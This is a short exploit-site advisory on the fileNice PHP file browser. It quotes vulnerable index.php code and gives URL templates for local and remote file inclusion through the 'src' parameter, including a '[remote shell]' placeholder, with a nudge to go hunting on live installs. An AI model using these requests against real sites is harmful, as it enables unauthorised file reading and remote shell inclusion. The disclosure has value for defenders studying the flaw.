fileNice php file browser RFI and LFI Vulnerabilities

=====================================================
fileNice php file browser RFI and LFI Vulnerabilities
=====================================================

FileNice file browser RFI&LFI
 
 
By: e.wiZz!
 
#######Script site: http://filenice.com
 
 
 
 
In the wild...
 
###################################
 
######Vulnerability:
 
 
index.php
 
...
if(isset($_GET['view'])){
    if(substr($_GET['view'],0,2) != ".." && substr($_GET['view'],0,1) != "/" && $_GET['view'] != "./" && !stristr($_GET['view'], '../')){
        $out = new FNOutput;
        $out->viewFile($_GET['view']);
    }else{
        // someone is poking around where they shouldn't be
        echo("Don't hack my shit yo.");
        exit;  
    }
}else if(isset($_GET['src'])){
    if(substr($_GET['src'],0,2) != ".." && substr($_GET['src'],0,1) != "/" && $_GET['src'] != "./" && !stristr($_GET['src'], '../')){
        $out = new FNOutput;
        $out->showSource($_GET['src']);
    }else{
        // someone is poking around where they shouldn't be
        echo("Don't hack my shit yo.");
        exit;  
    }
 
...
 
here is some security check for dir-traversal(can be bypassed),but there is no check for RFI,
also you can see source of any file which is in parent directory:
 
http://inthewild/path/index.php?src=[lfi]   // index.php or whatever
http://inthewild/path/index.php?src=[remote shell]
 
btw. there is lot of other vulnerabilities...happy huntin' :)



#  0day.today [2018-01-04]  #